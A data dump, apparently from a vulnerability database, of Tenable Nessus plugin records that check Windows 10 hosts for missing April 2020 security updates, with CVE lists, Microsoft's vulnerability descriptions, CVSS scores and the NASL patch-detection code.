\"CVE-2020-0968\",\n \"CVE-2020-0969\",\n \"CVE-2020-0982\",\n \"CVE-2020-0983\",\n \"CVE-2020-0985\",\n \"CVE-2020-0987\",\n \"CVE-2020-0988\",\n \"CVE-2020-0992\",\n \"CVE-2020-0993\",\n \"CVE-2020-0994\",\n \"CVE-2020-0995\",\n \"CVE-2020-0999\",\n \"CVE-2020-1003\",\n \"CVE-2020-1004\",\n \"CVE-2020-1005\",\n \"CVE-2020-1007\",\n \"CVE-2020-1008\",\n \"CVE-2020-1009\",\n \"CVE-2020-1011\",\n \"CVE-2020-1014\",\n \"CVE-2020-1015\",\n \"CVE-2020-1016\",\n \"CVE-2020-1020\",\n \"CVE-2020-1027\",\n \"CVE-2020-1094\"\n );\n script_xref(name:\"MSKB\", value:\"4550930\");\n script_xref(name:\"MSFT\", value:\"MS20-4550930\");\n script_xref(name:\"IAVA\", value:\"2020-A-0156-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/13\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0031\");\n\n script_name(english:\"KB4550930: Windows 10 April 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4550930.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when a\n Windows scheduled task improperly handles file\n redirections. An attacker who successfully exploited\n this vulnerability could delete a targeted file they\n would not have permissions to. (CVE-2020-0936)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0962)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-0948,\n CVE-2020-0949, CVE-2020-0950)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-0968)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-0889, CVE-2020-0953, CVE-2020-0959,\n CVE-2020-0960, CVE-2020-0988, CVE-2020-0992,\n CVE-2020-0994, CVE-2020-0995, CVE-2020-0999,\n CVE-2020-1008)\n\n - A remoted code execution vulnerability exists in the way\n that Microsoft Windows Codecs Library handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code. Exploitation\n of the vulnerability requires that a program process a\n specially crafted image file. The update addresses the\n vulnerability by correcting how Microsoft Windows Codecs\n Library handles objects in memory. (CVE-2020-0965)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-0937,\n CVE-2020-0945, CVE-2020-0946)\n\n - An elevation of privilege vulnerability exists in the\n way that the Microsoft Store Install Service handles\n file operations in protected locations. An attacker who\n successfully exploited the vulnerability could execute\n code with elevated permissions. (CVE-2020-1009)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows when the Windows Adobe Type Manager\n Library improperly handles a specially-crafted multi-\n master font - Adobe Type 1 PostScript format. For all\n systems except Windows 10, an attacker who successfully\n exploited the vulnerability could execute code remotely.\n For systems running Windows 10, an attacker who\n successfully exploited the vulnerability could execute\n code in an AppContainer sandbox context with limited\n privileges and capabilities. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as convincing a user to open a\n specially crafted document or viewing it in the Windows\n Preview pane. The update addresses the vulnerability by\n correcting how the Windows Adobe Type Manager Library\n handles Type1 fonts. (CVE-2020-0938, CVE-2020-1020)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1027)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0821, CVE-2020-1007)\n\n - An elevation of privilege vulnerability exists when the\n Windows Work Folder Service improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Work Folder Service\n handles file operations. (CVE-2020-1094)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0964)\n\n - An elevation of privilege vulnerability exists when the\n Windows Update Stack fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0985)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-1003)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0687)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Windows Update Client when it does not\n properly handle privileges. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-1014)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code on a target\n system. (CVE-2020-0907)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1004)\n\n - An elevation of privilege vulnerability exists in the\n way that the User-Mode Power Service (UMPS) handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1015)\n\n - An elevation of privilege vulnerability exists when the\n Windows Delivery Optimization service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code\n with elevated system privileges. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0983)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0956, CVE-2020-0958)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-0982,\n CVE-2020-0987, CVE-2020-1005)\n\n - An elevation of privilege vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in kernel mode. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0784)\n\n - An information disclosure vulnerability exists when the\n Windows Push Notification Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. An authenticated\n attacker could exploit this vulnerability by running a\n specially crafted application. The update addresses the\n vulnerability by correcting how the Windows Push\n Notification Service handles objects in memory.\n (CVE-2020-1016)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-0895, CVE-2020-0966,\n CVE-2020-0967)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-0952)\n\n - A denial of service vulnerability exists in Windows DNS\n when it fails to properly handle queries. An attacker\n who successfully exploited this vulnerability could\n cause the DNS service to become nonresponsive.\n (CVE-2020-0993)\n\n - An information disclosure vulnerability exists when\n certain central processing units (CPU) speculatively\n access memory. An attacker who successfully exploited\n the vulnerability could read privileged data across\n trust boundaries. (CVE-2020-0955)\n\n - An elevation of privilege vulnerability exists when the\n Windows System Assessment Tool improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows System Assessment Tool\n handles file operations. (CVE-2020-1011)\n \n - A remote code execution vulnerability exists in the way \n that the ChakraCore scripting engine handles objects in \n memory. The vulnerability could corrupt memory in such a \n way that an attacker could execute arbitrary code in the \n context of the current user. An attacker who successfully \n exploited the vulnerability could gain the same user \n rights as the current user. If the current user is logged \n on with administrative user rights, an attacker who \n successfully exploited the vulnerability could take \n control of an affected system. An attacker could then \n install programs; view, change, or delete data; or create \n new accounts with full user rights. (CVE-2020-0969)\");\n # https://support.microsoft.com/en-us/help/4550930/windows-10-update-kb4550930\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9b9dba94\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4550930.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1008\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-1020\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/04/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-04\";\nkbs = make_list('4550930');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"10240\",\n rollup_date:\"04_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4550930])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-05T14:16:46", "description": "The remote Windows host is missing security update 4550929.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when a Windows scheduled task improperly handles file redirections. An attacker who successfully exploited this vulnerability could delete a targeted file they would not have permissions to. (CVE-2020-0936)\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-0962)\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-0948, CVE-2020-0949, CVE-2020-0950)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-0968)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-0889, CVE-2020-0953, CVE-2020-0959, CVE-2020-0960, CVE-2020-0988, CVE-2020-0992, CVE-2020-0994, CVE-2020-0995, CVE-2020-0999, CVE-2020-1008)\n\n - An elevation of privilege vulnerability exists in the way the Windows Push Notification Service handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could then install programs; view, change or delete data. (CVE-2020-0940, CVE-2020-1006, CVE-2020-1017)\n\n - A remoted code execution vulnerability exists in the way that Microsoft Windows Codecs Library handles objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code. Exploitation of the vulnerability requires that a program process a specially crafted image file. The update addresses the vulnerability by correcting how Microsoft Windows Codecs Library handles objects in memory. (CVE-2020-0965)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1000, CVE-2020-1003)\n\n - An information disclosure vulnerability exists when Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-0937, CVE-2020-0945, CVE-2020-0946)\n\n - An elevation of privilege vulnerability exists in the way that the Microsoft Store Install Service handles file operations in protected locations. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1009)\n\n - A remote code execution vulnerability exists in Microsoft Windows when the Windows Adobe Type Manager Library improperly handles a specially-crafted multi- master font - Adobe Type 1 PostScript format. For all systems except Windows 10, an attacker who successfully exploited the vulnerability could execute code remotely.\n For systems running Windows 10, an attacker who successfully exploited the vulnerability could execute code in an AppContainer sandbox context with limited privileges and capabilities. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as convincing a user to open a specially crafted document or viewing it in the Windows Preview pane. The update addresses the vulnerability by correcting how the Windows Adobe Type Manager Library handles Type1 fonts. (CVE-2020-0938, CVE-2020-1020)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1027)\n\n - An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-0821, CVE-2020-1007)\n\n - An elevation of privilege vulnerability exists when the Windows Work Folder Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Work Folder Service handles file operations. (CVE-2020-1094)\n\n - A remote code execution vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in the memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0964)\n\n - An elevation of privilege vulnerability exists when the Windows Update Stack fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0985)\n\n - An elevation of privilege vulnerability exists when Connected User Experiences and Telemetry Service improperly handles file operations. An attacker who successfully exploited this vulnerability could overwrite files in arbitrary locations with elevated permissions. (CVE-2020-0942)\n\n - A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts. An attacker who successfully exploited the vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0687)\n\n - An elevation of privilege vulnerability exists in the Microsoft Windows Update Client when it does not properly handle privileges. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could then install programs; view, change or delete data. (CVE-2020-1014)\n\n - A remote code execution vulnerability exists in the way that Microsoft Graphics Components handle objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code on a target system. (CVE-2020-0907)\n\n - An elevation of privilege vulnerability exists when the Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1004)\n\n - An elevation of privilege vulnerability exists in the way that the User-Mode Power Service (UMPS) handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1015)\n\n - An elevation of privilege vulnerability exists when the Windows Delivery Optimization service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0983)\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0956, CVE-2020-0958)\n\n - An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-0982, CVE-2020-0987, CVE-2020-1005)\n\n - An elevation of privilege vulnerability exists when DirectX improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0784)\n\n - An information disclosure vulnerability exists when the Windows Push Notification Service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. An authenticated attacker could exploit this vulnerability by running a specially crafted application. The update addresses the vulnerability by correcting how the Windows Push Notification Service handles objects in memory.\n (CVE-2020-1016)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0895, CVE-2020-0966, CVE-2020-0967)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-0952)\n\n - A denial of service vulnerability exists in Windows DNS when it fails to properly handle queries. An attacker who successfully exploited this vulnerability could cause the DNS service to become nonresponsive.\n (CVE-2020-0993)\n\n - An information disclosure vulnerability exists when certain central processing units (CPU) speculatively access memory. An attacker who successfully exploited the vulnerability could read privileged data across trust boundaries. (CVE-2020-0955)\n\n - An elevation of privilege vulnerability exists when the Windows System Assessment Tool improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows System Assessment Tool handles file operations. (CVE-2020-1011) \n - A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0969)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-04-14T00:00:00", "type": "nessus", "title": "KB4550929: Windows 10 Version 1607 and Windows Server 2016 April 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0687", "CVE-2020-0784", "CVE-2020-0821", "CVE-2020-0889", "CVE-2020-0895", "CVE-2020-0907", "CVE-2020-0936", "CVE-2020-0937", "CVE-2020-0938", "CVE-2020-0940", "CVE-2020-0942", "CVE-2020-0945", "CVE-2020-0946", "CVE-2020-0948", "CVE-2020-0949", "CVE-2020-0950", "CVE-2020-0952", "CVE-2020-0953", "CVE-2020-0955", "CVE-2020-0956", "CVE-2020-0958", "CVE-2020-0959", "CVE-2020-0960", "CVE-2020-0962", "CVE-2020-0964", "CVE-2020-0965", "CVE-2020-0966", "CVE-2020-0967", "CVE-2020-0968", "CVE-2020-0969", "CVE-2020-0982", "CVE-2020-0983", "CVE-2020-0985", "CVE-2020-0987", "CVE-2020-0988", "CVE-2020-0992", "CVE-2020-0993", "CVE-2020-0994", "CVE-2020-0995", "CVE-2020-0999", "CVE-2020-1000", "CVE-2020-1003", "CVE-2020-1004", "CVE-2020-1005", "CVE-2020-1006", "CVE-2020-1007", "CVE-2020-1008", "CVE-2020-1009", "CVE-2020-1011", "CVE-2020-1014", "CVE-2020-1015", "CVE-2020-1016", "CVE-2020-1017", "CVE-2020-1020", "CVE-2020-1027", "CVE-2020-1094"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_APR_4550929.NASL", "href": "https://www.tenable.com/plugins/nessus/135468", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(135468);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2020-0687\",\n \"CVE-2020-0784\",\n \"CVE-2020-0821\",\n \"CVE-2020-0889\",\n \"CVE-2020-0895\",\n \"CVE-2020-0907\",\n \"CVE-2020-0936\",\n \"CVE-2020-0937\",\n \"CVE-2020-0938\",\n \"CVE-2020-0940\",\n \"CVE-2020-0942\",\n \"CVE-2020-0945\",\n \"CVE-2020-0946\",\n \"CVE-2020-0948\",\n \"CVE-2020-0949\",\n \"CVE-2020-0950\",\n \"CVE-2020-0952\",\n \"CVE-2020-0953\",\n \"CVE-2020-0955\",\n \"CVE-2020-0956\",\n \"CVE-2020-0958\",\n \"CVE-2020-0959\",\n \"CVE-2020-0960\",\n \"CVE-2020-0962\",\n \"CVE-2020-0964\",\n \"CVE-2020-0965\",\n \"CVE-2020-0966\",\n \"CVE-2020-0967\",\n \"CVE-2020-0968\",\n \"CVE-2020-0969\",\n \"CVE-2020-0982\",\n \"CVE-2020-0983\",\n \"CVE-2020-0985\",\n \"CVE-2020-0987\",\n \"CVE-2020-0988\",\n \"CVE-2020-0992\",\n \"CVE-2020-0993\",\n \"CVE-2020-0994\",\n \"CVE-2020-0995\",\n \"CVE-2020-0999\",\n \"CVE-2020-1000\",\n \"CVE-2020-1003\",\n \"CVE-2020-1004\",\n \"CVE-2020-1005\",\n \"CVE-2020-1006\",\n \"CVE-2020-1007\",\n \"CVE-2020-1008\",\n \"CVE-2020-1009\",\n \"CVE-2020-1011\",\n \"CVE-2020-1014\",\n \"CVE-2020-1015\",\n \"CVE-2020-1016\",\n \"CVE-2020-1017\",\n \"CVE-2020-1020\",\n \"CVE-2020-1027\",\n \"CVE-2020-1094\"\n );\n script_xref(name:\"IAVA\", value:\"2020-A-0139-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0156-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/13\");\n script_xref(name:\"MSKB\", value:\"4550929\");\n script_xref(name:\"MSFT\", value:\"MS20-4550929\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0031\");\n\n script_name(english:\"KB4550929: Windows 10 Version 1607 and Windows Server 2016 April 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4550929.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when a\n Windows scheduled task improperly handles file\n redirections. An attacker who successfully exploited\n this vulnerability could delete a targeted file they\n would not have permissions to. (CVE-2020-0936)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0962)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-0948,\n CVE-2020-0949, CVE-2020-0950)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-0968)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-0889, CVE-2020-0953, CVE-2020-0959,\n CVE-2020-0960, CVE-2020-0988, CVE-2020-0992,\n CVE-2020-0994, CVE-2020-0995, CVE-2020-0999,\n CVE-2020-1008)\n\n - An elevation of privilege vulnerability exists in the\n way the Windows Push Notification Service handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-0940,\n CVE-2020-1006, CVE-2020-1017)\n\n - A remoted code execution vulnerability exists in the way\n that Microsoft Windows Codecs Library handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code. Exploitation\n of the vulnerability requires that a program process a\n specially crafted image file. The update addresses the\n vulnerability by correcting how Microsoft Windows Codecs\n Library handles objects in memory. (CVE-2020-0965)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts 